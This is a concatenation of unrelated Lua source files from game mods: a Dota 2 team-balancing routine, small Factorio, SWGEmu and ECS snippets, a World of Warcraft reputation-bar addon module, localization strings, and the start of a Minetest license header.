return nil
end, 3.0)
else
GameRules:SetCustomGameSetupRemainingTime(self.start_time)
end
end
-- core
function TeamOrdering:ComputeTeamSelection()
-- print("ComputeTeamSelection()")
local n = PlayerResource:GetPlayerCount()
local k = PlayerResource:GetPlayerCountForTeam(DOTA_TEAM_GOODGUYS)
local acceptableWinratesDifference = 1 -- for 10v10 only
local halfCombinationsNumber = 126 -- generations number is n!/((n-k)!*k!)
-- local winratesBaseArray = {81.0, 77.0, 74.2, 65.1, 54.2, 53.2, 49.9, 43.3, 41.2, 32.8, 41.0, 71.0, 72.2, 62.1, 24.2, 33.2, 19.9, 63.3, 71.2, 92.8}
if GetMapName() == "imba_10v10" then
halfCombinationsNumber = 92378
end
-- not tested yet
-- if IsInToolsMode() then
-- for i = 0, n - 1 do
-- self.winrates[i] = winratesBaseArray[i + 1]
-- end
-- else
for i = 0, PlayerResource:GetPlayerCount() - 1 do
if PlayerResource:IsValidPlayer(i) then
if api:GetPlayerXPLevel(i) <= self.minimum_level_to_reorder then
self.winrates[i] = self.fixed_winrate_for_rookies
-- print("Rookie player! Player ID/Name/Winrate:", i, PlayerResource:GetPlayerName(i), self.fixed_winrate_for_rookies)
else
local seasonal_winrate = api:GetPlayerSeasonalWinrate(i)
-- if calibrated
if type(seasonal_winrate) == "number" then
self.winrates[i] = seasonal_winrate or 50.00042 -- specific value to notice when winrate couldn't be gathered
-- print("Player ID/Name/Winrate:", i, PlayerResource:GetPlayerName(i), seasonal_winrate)
else
self.winrates[i] = api:GetPlayerWinrate(i)
end
end
end
end
-- end
if IsInToolsMode() then
print(self.winrates)
end
local combination = {}
for i = 0, k - 1 do
combination[i] = i
end
combination[k] = n
local winratesDifference = nil
local smallestWinratesDifference = 100 * k -- highest winrates difference possible
local bestTeamAOrdering = {}
local bestTeamBOrdering = {}
for i = 0, halfCombinationsNumber - 1 do
-- start of operations with combination
local oppositeCombination = {}
for j = 0, n - 1 do
oppositeCombination[j] = j
end
oppositeCombination = TableSubtract(oppositeCombination, combination)
local teamA = CopyArray(combination, k)
local teamB = CopyArray(oppositeCombination, k)
winratesDifference = self:CalculateWinratesDifference(teamA, teamB)
if GetMapName() == "imba_10v10" and winratesDifference < acceptableWinratesDifference then
smallestWinratesDifference = winratesDifference
bestTeamAOrdering = CopyArray(teamA, k)
bestTeamBOrdering = CopyArray(teamB, k)
break
end
if winratesDifference then
-- print("Winrate Diffs:", winratesDifference, smallestWinratesDifference)
if winratesDifference < smallestWinratesDifference then
smallestWinratesDifference = winratesDifference
bestTeamAOrdering = CopyArray(teamA, k)
bestTeamBOrdering = CopyArray(teamB, k)
end
end
-- end of operations with combination
local jKeeper = 0
for j = 0, k do
jKeeper = j
if combination[j] + 1 and combination[j + 1] and combination[j] + 1 == combination[j + 1] then
combination[j] = j
else
break
end
end
if jKeeper < k then
combination[jKeeper] = combination[jKeeper] + 1
else
break
end
end
-- print("Radiant comp:", bestTeamAOrdering)
-- print("Dire comp:", bestTeamBOrdering)
self.Radiant = bestTeamAOrdering
self.Dire = bestTeamBOrdering
-- Call it here to show team comp to players
self:SetTeams_PostCompute()
end
function TeamOrdering:CalculateWinratesDifference(teamA, teamB)
local winrateTeamA = 0
local winrateTeamB = 0
for _, playerAIndex in pairs(teamA) do
if self.winrates[playerAIndex] and type(self.winrates[playerAIndex]) == "number" then
winrateTeamA = winrateTeamA + self.winrates[playerAIndex]
end
end
for _, playerBIndex in pairs(teamB) do
if self.winrates[playerBIndex] and type(self.winrates[playerBIndex]) == "number" then
winrateTeamB = winrateTeamB + self.winrates[playerBIndex]
end
end
return math.abs(winrateTeamA - winrateTeamB)
end
-- hRadiant and hDire should return both an array of player id's
function TeamOrdering:SetTeams_PostCompute(hRadiant, hDire)
-- unassign players
for i = 0, PlayerResource:GetPlayerCount() - 1 do
local player = PlayerResource:GetPlayer(i)
player:SetTeam(DOTA_TEAM_NOTEAM)
end
for k, v in pairs(self.Radiant or {}) do
local player = PlayerResource:GetPlayer(v)
player:SetTeam(DOTA_TEAM_GOODGUYS)
end
for k, v in pairs(self.Dire or {}) do
local player = PlayerResource:GetPlayer(v)
player:SetTeam(DOTA_TEAM_BADGUYS)
end
GameRules:SetCustomGameSetupRemainingTime(self.start_time)
end
function TeamOrdering:OnPlayerReconnect(iPlayerID)
local player_team_set = false
for k, v in pairs(self.Radiant or {}) do
if v == iPlayerID then
local player = PlayerResource:GetPlayer(v)
player:SetTeam(DOTA_TEAM_GOODGUYS)
player_team_set = true
break
end
end
if player_team_set == false then
for k, v in pairs(self.Dire or {}) do
if v == iPlayerID then
local player = PlayerResource:GetPlayer(v)
player:SetTeam(DOTA_TEAM_BADGUYS)
break
end
end
end
end
-- utils
function PrintArray(array)
local text = ""
for i = 0, #array do
text = text..array[i].."|"
end
print(text)
end
function CopyArray(array, length)
local newArray = {}
for i = 0, length - 1 do
newArray[i] = array[i]
end
return newArray
end
function tableRemoveAtIndexZero(table)
local newTable = {}
for i = 0, #table - 1 do
newTable[i] = table[i+1]
end
return newTable
end
function TableSubtract(greaterTable, smallerTable)
local set = {}
for i = 0, #smallerTable do
set[smallerTable[i]] = true;
end
local difference = {}
for i = 0, #greaterTable do
difference[i] = greaterTable[i]
end
for i = #difference, 0, -1 do
if set[difference[i]] then
if i == 0 then
difference = tableRemoveAtIndexZero(difference)
else
table.remove(difference, i)
end
end
end
return difference
end
|
return function(x, y)
return {
x = x,
y = y,
r = 4,
vx = 0,
vy = -600,
deleteWhenAboveScreen = true,
health = 1,
damage = 1,
isBullet = true,
}
end
|
data:extend(
{
{
type = "item",
name = "purified-titanium-ore",
icon = "__spicy-teeth-core_assets__/graphics/icons/purified-titanium-ore.png",
icon_size = 32,
subgroup = "raw-material",
order = "e-a[purified-titanium-ore]",
stack_size = 50
}
}
)
|
local Component = {}
Component.__index = Component
--- Creates a new Component.
-- @param populate A function that populates the Bag with values
-- @param inherit States if the Bag should inherit the Component's functions
-- @return A Component object
function Component.new(populate, inherit)
local component = setmetatable({
__populate = populate,
__inherit = inherit,
}, Component)
if inherit then
component.__mt = {__index = component}
end
return component
end
-- Creates and initializes a new Bag.
-- @param ... The values passed to the populate function
-- @return A new initialized Bag
function Component:__initialize(...)
if self.__populate then
local bag = {}
self.__populate(bag, ...)
if self.__inherit then
setmetatable(bag, self.__mt)
end
return bag
end
return true
end
return setmetatable(Component, {
__call = function(_, ...) return Component.new(...) end,
})
|
object_ship_nova_orion_smuggler_medium_tier9 = object_ship_shared_nova_orion_smuggler_medium_tier9:new {
}
ObjectTemplates:addTemplate(object_ship_nova_orion_smuggler_medium_tier9, "object/ship/nova_orion_smuggler_medium_tier9.iff")
|
--[=====[
## XP MultiBar ver. @@release-version@@
## XPMultiBar_Reputation.lua - module
Reputation module for XPMultiBar addon
--]=====]
local addonName = ...
local Utils = LibStub("rmUtils-1.0")
local XPMultiBar = LibStub("AceAddon-3.0"):GetAddon(addonName)
local Reputation = XPMultiBar:NewModule("Reputation")
local LibQT = LibStub("LibQTip-1.0")
local wowClassic = Utils.IsWoWClassic
local R = Reputation
local L = LibStub("AceLocale-3.0"):GetLocale(addonName)
local Config
local UI
local emptyFun = Utils.EmptyFn
local next = next
local pairs = pairs
local select = select
local setmetatable = setmetatable
local tonumber = tonumber
local tostring = tostring
local type = type
local unpack = unpack
local math_floor = math.floor
local _G = _G
local FACTION_ALLIANCE = FACTION_ALLIANCE
local FACTION_BAR_COLORS = FACTION_BAR_COLORS
local FACTION_HORDE = FACTION_HORDE
local GUILD = GUILD
local RED_FONT_COLOR = RED_FONT_COLOR
local SOUNDKIT = SOUNDKIT
local GameTooltip = GameTooltip
local GameTooltipTextSmall = GameTooltipTextSmall
local UIParent = UIParent
local WorldFrame = WorldFrame
local hooksecurefunc = hooksecurefunc
local CollapseFactionHeader = CollapseFactionHeader
local CreateColor = CreateColor
local CreateFramePool = CreateFramePool
local ExpandFactionHeader = ExpandFactionHeader
local GameTooltip_AddColoredLine = GameTooltip_AddColoredLine
local GameTooltip_AddErrorLine = GameTooltip_AddErrorLine
local GameTooltip_AddInstructionLine = GameTooltip_AddInstructionLine
local GameTooltip_AddNormalLine = GameTooltip_AddNormalLine
local GameTooltip_InsertFrame = GameTooltip_InsertFrame
local GameTooltip_SetDefaultAnchor = GameTooltip_SetDefaultAnchor
local GameTooltip_SetTitle = GameTooltip_SetTitle
local GetCursorPosition = GetCursorPosition
local GetFactionInfo = GetFactionInfo
local GetFactionInfoByID = GetFactionInfoByID
local GetGuildInfo = GetGuildInfo
local GetNumFactions = GetNumFactions
local GetSelectedFaction = GetSelectedFaction
local GetWatchedFactionInfo = GetWatchedFactionInfo
local IsAltKeyDown = IsAltKeyDown
local IsControlKeyDown = IsControlKeyDown
local IsShiftKeyDown = IsShiftKeyDown
local PlaySound = PlaySound
local SetWatchedFactionIndex = SetWatchedFactionIndex
local GetFactionParagonInfo = emptyFun
local IsFactionParagon = emptyFun
local GetFriendshipReputation = GetFriendshipReputation or emptyFun
if not wowClassic then
GetFactionParagonInfo = C_Reputation.GetFactionParagonInfo
IsFactionParagon = C_Reputation.IsFactionParagon
end
-- Remove all known globals after this point
-- luacheck: std none
-- luacheck: push globals ReputationTooltipStatusBarMixin ReputationDetailFavoriteFactionCheckBoxMixin ReputationTooltipStatusBarBorderMixin
ReputationTooltipStatusBarMixin = {}
ReputationDetailFavoriteFactionCheckBoxMixin = {}
ReputationTooltipStatusBarBorderMixin = {}
local rb = ReputationTooltipStatusBarMixin
local fav = ReputationDetailFavoriteFactionCheckBoxMixin
local bx = ReputationTooltipStatusBarBorderMixin
-- luacheck: pop
-- luacheck: push globals ReputationDetailFrame
local repDetailFrame = ReputationDetailFrame
-- luacheck: pop
-- luacheck: push globals ReputationDetailMainScreenCheckBox ReputationDetailLFGBonusReputationCheckBox
local watchedCheckbox = ReputationDetailMainScreenCheckBox
local lfgBonusRepCheckbox = ReputationDetailLFGBonusReputationCheckBox
-- luacheck: pop
--[[ Common local functions ]]
if type(GameTooltip_AddErrorLine) ~= "function" then
-- Function is absent in Classic
GameTooltip_AddErrorLine = function(tooltip, text, wrap)
return GameTooltip_AddColoredLine(tooltip, text, RED_FONT_COLOR, wrap)
end
end
local function GetColorRGBA(color)
return color.r or 0, color.g or 0, color.b or 0, color.a or 1
end
local function CreateColorMixin(color)
return CreateColor(GetColorRGBA(color))
end
local function GetErrorText(text)
return RED_FONT_COLOR:WrapTextInColorCode(text)
end
--[[ Border methods ]]
function bx:OnLoad()
self:SetBackdrop({
edgeFile = "Interface\\Tooltips\\UI-Tooltip-Border",
edgeSize = 10,
insets = { left = 5, right = 5, top = 5, bottom = 5 },
})
end
--[[ Favorite Checkbox methods ]]
function fav:OnLoad()
_G[self:GetName() .. "Text"]:SetText(L["Favorite faction"])
self:Hide()
R.favoriteCheckbox = self
end
function fav:OnClick()
local checked = self:GetChecked()
PlaySound(checked
and SOUNDKIT.IG_MAINMENU_OPTION_CHECKBOX_ON
or SOUNDKIT.IG_MAINMENU_OPTION_CHECKBOX_OFF
)
self:SetFactionFavorite(self.factionID, checked)
end
function fav:OnEnter()
GameTooltip:SetOwner(self, "ANCHOR_RIGHT");
GameTooltip:SetText(L["Choose faction to show in favorites list"], nil, nil, nil, nil, true);
end
function fav:SetFactionFavorite(factionID, isFavorite)
local favorites = Config.GetDB().reputation.favorites
favorites[factionID] = isFavorite and true or nil
end
--[[ Rep StatusBar methods ]]
function rb:OnLoad()
self.status = self.statusFrame.status
self.border = self.statusFrame.border
self.leftText = self.statusFrame.border.leftText
self.rightText = self.statusFrame.border.rightText
end
function rb:AfterInsert(tooltip, reservedHeight)
local _, relative = self:GetPoint(1)
self:SetPoint("TOPLEFT", relative, "TOPLEFT", 0, 0)
self:SetPoint("RIGHT", tooltip, "RIGHT", -10, 0)
self:Show()
end
function rb:SetHeader(text)
self.header:SetText(text)
end
function rb:SetStatusBarValues(min, max, current)
self.status:SetMinMaxValues(min, max)
self.status:SetValue(current)
end
function rb:SetStatusBarColor(color)
local r, g, b, a = GetColorRGBA(color)
self.status:SetStatusBarColor(r, g, b, a)
self.border:SetBackdropBorderColor(r, g, b, a)
end
function rb:SetStatusBarTexts(leftText, rightText)
self.leftText:SetText(leftText)
self.rightText:SetText(rightText)
end
function rb:SetError(text)
self:SetHeader(GetErrorText(text))
self:SetStatusBarValues(0, 1, 1)
self:SetStatusBarColor(RED_FONT_COLOR)
self:SetStatusBarTexts("", "")
end
--[[ Module methods ]]
function R:OnInitialize()
Config = XPMultiBar:GetModule("Config")
UI = XPMultiBar:GetModule("UI")
-- Patch LibQTip
local labelProto = LibQT.LabelPrototype
local oldMethod = labelProto.InitializeCell
labelProto.InitializeCell = function(proto, ...)
local result = oldMethod(proto, ...)
proto.fontString:SetWordWrap(false)
return result
end
-- Secure hook ReputationFrame_Update
local mod = self
hooksecurefunc("ReputationFrame_Update", function()
mod:OnReputationFrameUpdate()
end)
end
function R:OnEnable()
end
function R:OnDisable()
end
function R:OnReputationFrameUpdate()
local config = Config.GetDB().reputation
local factionID = select(14, GetFactionInfo(GetSelectedFaction()))
if config.showFavorites and repDetailFrame:IsShown() then
local hasLfgCheckbox = lfgBonusRepCheckbox and lfgBonusRepCheckbox:IsShown()
local relCheckbox = hasLfgCheckbox and lfgBonusRepCheckbox or watchedCheckbox
repDetailFrame:SetHeight(hasLfgCheckbox and 247 or 225)
self.favoriteCheckbox.factionID = factionID
if wowClassic then
self.favoriteCheckbox:SetPoint("BOTTOMLEFT", repDetailFrame, "BOTTOMLEFT", 14, 56)
else
self.favoriteCheckbox:SetPoint("TOPLEFT", relCheckbox, "BOTTOMLEFT", 0, 3)
end
self.favoriteCheckbox:SetChecked(config.favorites[factionID] or false)
self.favoriteCheckbox:Show()
else
self.favoriteCheckbox:ClearAllPoints()
self.favoriteCheckbox:Hide()
end
end
-- Reputation colors
local STANDING_EXALTED = 8
local reputationColors
-- Reputation colors are automatically generated and cached when first looked up
do
reputationColors = setmetatable({}, {
__index = function(t, k)
local fbc
if k == STANDING_EXALTED then
-- Exalted color is set separately
-- Return default value if it is not set
fbc = { r = 0, g = 0.77, b = 0.63 }
else
fbc = FACTION_BAR_COLORS[k]
end
-- Wrap in mixin to use ColorMixin:WrapTextInColorCode(text)
local colorMixin = CreateColorMixin(fbc)
t[k] = colorMixin
return colorMixin
end,
})
end
-- Cache FACTION_STANDING_LABEL
-- When a lookup is first attempted on this cable, we go and lookup the real value and cache it
local factionStandingLabel
do
factionStandingLabel = setmetatable({}, {
__index = function(t, k)
local fsl = _G["FACTION_STANDING_LABEL"..k]
t[k] = fsl
return fsl
end,
})
end
local repMenuTooltipKey = addonName .. "RepMenuTT"
local repMenu
local tags = {
minus = [[|TInterface\Buttons\UI-MinusButton-Up:16:16:1:-1|t]],
plus = [[|TInterface\Buttons\UI-PlusButton-Up:16:16:1:-1|t]],
lfgBonus = [[|TInterface\Common\ReputationStar:12:12:0:0:32:32:0:15:0:15|t]],
repBonus = [[|TInterface\Common\ReputationStar:12:12:0:0:32:32:16:31:16:31|t]],
atWar = [[|TInterface\WorldStateFrame\CombatSwords:16:16:0:0:32:32:0:15:0:15|t]],
paragon = [[|A:ParagonReputation_Bag:12:10:0:0|a]],
paragonReward = [[|A:ParagonReputation_Bag:12:10:0:0|a|A:ParagonReputation_Checkmark:10:10:-10:0|a]],
}
local instructions = {
collapse = L["Right Button click to collapse %1$s factions"],
expand = L["Right Button click to expand %1$s factions"],
watch = L["Click to watch %1$s reputation"],
unwatch = L["Click to stop watching %1$s reputation"],
favorite = L["Ctrl+Click to add %1$s to favorite factions"],
unfavorite = L["Ctrl+Click to remove %1$s from favorite factions"],
}
local function GetFactionReputationData(factionID)
local repName, repDesc, repStanding, repMin, repMax, repValue,
atWarWith, _--[[canToggleAtWar]], isHeader,
isCollapsed, hasRep, isWatched, isChild,
_--[[factionID]], hasBonusRep, canBeLFGBonus = GetFactionInfoByID(factionID)
local isFactionParagon, hasParagonReward, paragonCount = false, false, 0
local repStandingText, repStandingColor, isLFGBonus, paragonRewardQuestID
if not repName then
-- Return nil for non-existent factions
return nil
end
local friendID, friendRep, friendMaxRep, _--[[friendName]], _, _,
friendTextLevel, friendThresh, nextFriendThresh = GetFriendshipReputation(factionID)
if friendID then
if nextFriendThresh then
-- Not yet "Exalted" with friend, use provided max for current level.
repMax = nextFriendThresh
repValue = friendRep - friendThresh
else
-- "Exalted". Fake the maxRep.
repMax = friendMaxRep + 1
repValue = 1
end
repMax = repMax - friendThresh
repStandingText = friendTextLevel
else
repStandingText = repStanding and factionStandingLabel[repStanding]
isFactionParagon = IsFactionParagon(factionID)
-- Check faction with Exalted standing to have paragon reputation.
-- If so, adjust values to show bar to next paragon bonus.
if repStanding == STANDING_EXALTED then
if isFactionParagon then
local parValue, parThresh, paragonQuestID, hasReward, tooLowLevelForParagon
= GetFactionParagonInfo(factionID)
paragonRewardQuestID = paragonQuestID
hasParagonReward = not tooLowLevelForParagon and hasReward
-- parValue is cumulative. We need to get modulo by the current threshold.
repMax = parThresh
paragonCount = math_floor(parValue / parThresh)
repValue = parValue % parThresh
-- if we have reward pending, show overflow
if hasParagonReward then
repValue = repValue + parThresh
end
else
repMax = 1000
repValue = 999
end
else
repMax = repMax - repMin
repValue = repValue - repMin
end
end
repMin = 0
repStandingColor = repStanding and reputationColors[repStanding]
isLFGBonus = false
return factionID, repName, repStanding, repStandingText, repStandingColor,
repMin, repMax, repValue, hasBonusRep, isLFGBonus,
isFactionParagon, hasParagonReward, atWarWith,
isHeader, hasRep, isCollapsed, isChild, isWatched, repDesc,
paragonRewardQuestID, paragonCount
end
local function SetWatchedFactionByName(factionName, amount, autotrackGuild)
if factionName == FACTION_HORDE or factionName == FACTION_ALLIANCE then
-- Do not track Horde / Alliance classic faction header
return
end
if tonumber(amount) <= 0 then
-- We do not want to watch factions we are losing reputation with
return
end
-- Fix for auto tracking guild reputation since the COMBAT_TEXT_UPDATE does not contain
-- the guild name, it just contains "Guild"
if factionName == GUILD then
if autotrackGuild then
factionName = GetGuildInfo("player")
else
return
end
end
-- Everything ok? Watch the faction!
for i = 1, GetNumFactions() do
-- name, description, standingID, barMin, barMax, barValue, atWarWith,
-- canToggleAtWar, isHeader, isCollapsed, hasRep, isWatched, isChild,
-- factionID, hasBonusRepGain, canBeLFGBonus = GetFactionInfo(factionIndex);
local fi = { GetFactionInfo(i) }
local name, isHeader, hasRep, isWatched = fi[1], fi[9], fi[11], fi[12]
if name == factionName then
-- If it is not watched and it is not a header without rep, watch it.
if not isWatched and (not isHeader or hasRep) then
SetWatchedFactionIndex(i)
end
return
end
end
end
local function ClearFrame(pool, frame)
frame:Hide()
frame:ClearAllPoints()
frame:SetParent(nil)
end
local function IsFactionMenuShown()
return LibQT:IsAcquired(repMenuTooltipKey)
end
local function AcquireRepMenuTooltip(frame, repConfig)
repMenu = LibQT:Acquire(repMenuTooltipKey, 5)
repMenu:SetClampedToScreen(true)
repMenu:SetScale(repConfig.menuScale)
repMenu:ClearAllPoints()
repMenu:SetAutoHideDelay(repConfig.menuAutoHideDelay, frame)
repMenu:EnableMouse()
return repMenu
end
local function GetFactionIcons(hasBonusRep, isLFGBonus, isFactionParagon, hasParagonReward, isAtWar)
local icons = ""
if isAtWar then
icons = icons .. tags.atWar
end
if isLFGBonus then
icons = icons .. tags.lfgBonus
end
if hasBonusRep then
icons = icons .. tags.repBonus
end
if isFactionParagon then
icons = icons .. (hasParagonReward and tags.paragonReward or tags.paragon)
end
return icons
end
local function GetReputationFrame(faction, showHeader, commifyNumbers)
local frameHeights = { 20, 36 }
if not R.framePool then
R.framePool = CreateFramePool("FRAME", nil, "ReputationTooltipStatusBar", ClearFrame)
end
if type(faction) == "number" then
faction = { GetFactionReputationData(faction) }
end
local _, name, _, standingName, color, min, max, current,
hasBonusRep, isLFGBonus, isFactionParagon, hasParagonReward, isAtWar = unpack(faction)
local frame = R.framePool:Acquire()
local commify = commifyNumbers and Utils.Commify or tostring
frame:Hide()
if name then
if showHeader == 2 then
name = name .. "\32" .. GetFactionIcons(hasBonusRep, isLFGBonus, isFactionParagon, hasParagonReward, isAtWar)
end
frame:SetHeader(name)
frame:SetStatusBarValues(min, max, current)
frame:SetStatusBarColor(color)
frame:SetStatusBarTexts(standingName, ("%s/%s"):format(commify(current or 0), commify(max or 0)))
else
frame:SetError(L["Faction error!"])
end
if showHeader > 0 then
frame.header:Show()
frame:SetHeight(frameHeights[2])
else
frame.header:Hide()
frame:SetHeight(frameHeights[1])
end
return frame
end
local function ReleaseFrames()
if R.framePool then
R.framePool:ReleaseAll()
end
end
local function ClickMenuItem(_, faction, button)
local factionIndex, factionID, isCollapsed, isHeader, hasRep
= faction.index, faction.id, faction.isCollapsed, faction.isHeader, faction.hasRep
local isWatched, isFavorite = faction.isWatched, faction.isFavorite
local menu = faction.menu
local isAlt, isCtrl, isShift = IsAltKeyDown(), IsControlKeyDown(), IsShiftKeyDown()
if button == "RightButton" and isHeader then
local func = isCollapsed and ExpandFactionHeader or CollapseFactionHeader
func(factionIndex)
menu:UpdateScrolling()
elseif not isHeader or hasRep then
if button == "MiddleButton" or button == "LeftButton" and isCtrl then
fav:SetFactionFavorite(factionID, not isFavorite)
R:ShowFactionMenu(true)
if R.favoriteCheckbox and R.favoriteCheckbox.factionID == factionID then
R.favoriteCheckbox:SetChecked(not isFavorite)
end
elseif button == "LeftButton" then
SetWatchedFactionIndex(isWatched and 0 or factionIndex)
end
end
end
local function ShowMenuItemTooltip(line, tip)
GameTooltip:SetMinimumWidth(250, true)
GameTooltip_SetDefaultAnchor(GameTooltip, WorldFrame)
GameTooltip_SetTitle(GameTooltip, tip.name)
if tip.desc then
GameTooltip_AddNormalLine(GameTooltip, tip.desc)
end
local isHeader, hasRep = unpack(tip.faction, 14, 15)
if not isHeader or hasRep then
local commify = Config.GetDB().general.commify
local repStatus = GetReputationFrame(tip.faction, 0, commify)
local height = GameTooltip_InsertFrame(GameTooltip, repStatus)
repStatus:AfterInsert(GameTooltip, height)
end
if tip.instruction then
GameTooltip_AddInstructionLine(GameTooltip, tip.instruction)
end
GameTooltip:Show()
end
local function HideMenuItemTooltip()
GameTooltip:Hide()
GameTooltip:SetMinimumWidth(0, false)
ReleaseFrames()
end
local function FillReputationMenu(config)
local normalFont = repMenu:GetFont()
local smallFont = GameTooltipTextSmall
local isUnderChildHeader = false
local lineNum
repMenu:Hide()
repMenu:Clear()
for factionNum = 1, GetNumFactions() do
-- GetFactionInfo returns only 10 values for 'Other' header so factionID is nil
-- Use 0 instead
local factionID = select(14, GetFactionInfo(factionNum)) or 0
local factionInfo = { GetFactionReputationData(factionID) }
local _, repName, repStanding, repStandingText, repStandingColor,
repMin, repMax, repValue, hasBonusRep, isLFGBonus,
isFactionParagon, hasParagonReward, isAtWar,
isHeader, hasRep, isCollapsed, isChild, isWatched, repDesc = unpack(factionInfo)
local icons = config.showIcons
and GetFactionIcons(hasBonusRep, isLFGBonus, isFactionParagon, hasParagonReward, isAtWar)
or ""
local isFavorite = config.favorites[factionID]
local instruction
--[[
Menu columns:
I II III IV V
[-] Header text stand. icons
Fraction name stand. icons
[-] Head stand. icons
Fract. stand. icons
]]
if isHeader then
local columnForTag, columnForName, nameColumnSpan = 1, 2, 4
local tag = isCollapsed and tags.plus or tags.minus
instruction = isCollapsed and instructions.expand or instructions.collapse
isUnderChildHeader = isChild
if isChild then
columnForTag, columnForName, nameColumnSpan = 2, 3, 3
end
if hasRep then
nameColumnSpan = nameColumnSpan - 2
if config.showFavorites then
instruction = (isFavorite and instructions.unfavorite or instructions.favorite)
.. "|n" .. instruction
end
instruction = (isWatched and instructions.unwatch or instructions.watch)
.. "|n" .. instruction
end
lineNum = repMenu:AddLine()
repMenu:SetCell(lineNum, columnForTag, tag, normalFont)
repMenu:SetCell(lineNum, columnForName, repName, normalFont, nameColumnSpan, nil, nil, nil, 160)
if hasRep then
repMenu:SetCell(lineNum, 4, repStandingColor:WrapTextInColorCode(repStandingText), normalFont)
if icons then
repMenu:SetCell(lineNum, 5, icons, normalFont)
end
end
else
local columnForName, nameColumnSpan = 2, 2
instruction = (isWatched and instructions.unwatch or instructions.watch)
if config.showFavorites then
instruction = instruction .. "|n"
.. (isFavorite and instructions.unfavorite or instructions.favorite)
end
if isUnderChildHeader then
columnForName, nameColumnSpan = 3, 1
end
lineNum = repMenu:AddLine()
repMenu:SetCell(
lineNum, columnForName,
repStandingColor:WrapTextInColorCode(repName),
smallFont, nameColumnSpan, nil, nil, nil, 160
)
repMenu:SetCell(lineNum, 4, repStandingColor:WrapTextInColorCode(repStandingText), smallFont)
if icons then
repMenu:SetCell(lineNum, 5, icons, normalFont)
end
end
if isWatched then
repMenu:SetLineColor(lineNum, GetColorRGBA(config.watchedFactionLineColor))
elseif config.showFavorites and isFavorite then
repMenu:SetLineColor(lineNum, GetColorRGBA(config.favoriteFactionLineColor))
end
local onEnterArgs = {
faction = factionInfo,
name = repName .. "\32" .. icons,
desc = repDesc,
instruction = instruction:format(repName),
}
repMenu:SetLineScript(
lineNum, "OnMouseUp", ClickMenuItem,
{
id = factionID,
index = factionNum,
isCollapsed = isCollapsed,
isHeader = isHeader,
hasRep = hasRep,
isFavorite = isFavorite,
isWatched = isWatched,
name = repName,
menu = repMenu,
}
)
repMenu:SetLineScript(lineNum, "OnEnter", ShowMenuItemTooltip, onEnterArgs)
repMenu:SetLineScript(lineNum, "OnLeave", HideMenuItemTooltip)
end
end
local function AttachReputationMenu(bar, menu, scale)
local x, _ = GetCursorPosition()
if x then
local widthExtra = 30 -- extra (scroller?) width not accounted in menu:GetWidth()
local uiScale = UIParent:GetEffectiveScale()
local uiWidth, uiHeight = UIParent:GetWidth(), UIParent:GetHeight()
local barX, barY = bar:GetLeft(), bar:GetTop()
local menuWidth = menu:GetWidth()
local anchorX, anchorY = (x / uiScale - barX) / scale, 0 / scale
local anchorH, anchorV = (x / uiScale + menuWidth + widthExtra > uiWidth) and "RIGHT" or "LEFT",
(barY > uiHeight / 2) and "TOP" or "BOTTOM"
local anchorRelH, anchorRelV = "LEFT", anchorV == "BOTTOM" and "TOP" or "BOTTOM"
menu:SetPoint(anchorV .. anchorH, bar, anchorRelV .. anchorRelH, anchorX, anchorY)
else
menu:SetPoint("LEFT", UIParent, "CENTER", 0, 0)
end
end
local function ShowFactionMenu(acquire)
local db = Config.GetDB()
if acquire then
AcquireRepMenuTooltip(UI.barFrame, db.reputation)
end
FillReputationMenu(Utils.Merge({ showIcons = db.bars.repicons }, db.reputation))
if acquire then
AttachReputationMenu(UI.barFrame, repMenu, db.reputation.menuScale)
end
repMenu:UpdateScrolling()
repMenu:Show()
end
function R:SetExaltedColor(color)
color.a = 1
reputationColors[STANDING_EXALTED] = CreateColorMixin(color)
end
function R:ToggleBarTooltip(visibility)
if visibility and not IsFactionMenuShown() then
local db = Config.GetDB()
local bar = UI.barFrame
local factions = db.reputation.favorites
local commify = db.general.commify
GameTooltip:SetMinimumWidth(250, true)
GameTooltip:SetOwner(bar, "ANCHOR_NONE")
GameTooltip_SetTitle(GameTooltip, L["Favorite Factions"])
if not factions or next(factions) == nil then
GameTooltip_AddErrorLine(GameTooltip, L["No favorite factions selected"], true)
GameTooltip_AddInstructionLine(GameTooltip, L["Add some favorite factions"], true)
end
for k, v in pairs(factions) do
if v then
local showHeader = db.bars.repicons and 2 or 1
local repFrame = GetReputationFrame(k, showHeader, commify)
local fullHeight = GameTooltip_InsertFrame(GameTooltip, repFrame)
repFrame:AfterInsert(GameTooltip, fullHeight)
end
end
local ttWidth = GameTooltip:GetWidth()
local uiScale = UIParent:GetEffectiveScale()
local x, _ = GetCursorPosition()
local left, right, halfWidth = bar:GetLeft(), bar:GetRight(), ttWidth / 2
local side, offX = "LEFT", halfWidth
if x / uiScale > right - halfWidth then
side, offX = "RIGHT", -halfWidth
elseif x / uiScale > left + halfWidth then
offX = x / uiScale - left
end
GameTooltip:SetPoint("BOTTOM", bar, "TOP" .. side, offX, 5)
GameTooltip:Show()
elseif GameTooltip:IsShown() then
GameTooltip:Hide()
GameTooltip:SetMinimumWidth(0, false)
ReleaseFrames()
end
end
function R:GetWatchedFactionData()
local watchedFactionInfo = { GetWatchedFactionInfo() }
if not watchedFactionInfo[1] then
-- watched faction name == nil - watched faction not set
return nil
else
return GetFactionReputationData(watchedFactionInfo[6])
end
end
function R:GetFactionData(factionID)
if not factionID then
return nil
else
return GetFactionReputationData(factionID)
end
end
function R:SetWatchedFaction(factionName, amount, autotrackGuild)
return SetWatchedFactionByName(factionName, amount, autotrackGuild)
end
function R:ShowFactionMenu(redraw)
local isShown = IsFactionMenuShown()
redraw = redraw and true or false
if redraw == isShown then
self:ToggleBarTooltip(false)
ShowFactionMenu(not redraw)
elseif isShown then
LibQT:Release(repMenu)
end
end
|
local localization = {
mod_description = {
en = "Miscellaneous tweaks."
},
PLAYER_HEIGHT = {
en = "Player Height Multiplier"
},
PLAYER_HEIGHT_T = {
en = "Player height multiplier. Crouch to refresh ingame."
},
DODGE_DISTANCE = {
en = "Dodge Distance Multiplier"
},
DODGE_DISTANCE_T = {
en = "Dodge distance multiplier."
},
}
return localization
|
--Minetest
--Copyright (C) 2013 sapier
--
--This program is free software; you can redistribute it and/or modify
--it under the terms of the GNU Lesser General Public License as published by
--the Free Software Foundation; either version 2.1 of the License, or
--(at your option) any later version.
--
--This program is distributed in the hope that it will be useful,
--but WITHOUT ANY WARRANTY; without even the implied warranty of
--MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
--GNU Lesser General Public License for more details.
--
--You should have received a copy of the GNU Lesser General Public License along
--with this program; if not, write to the Free Software Foundation, Inc.,
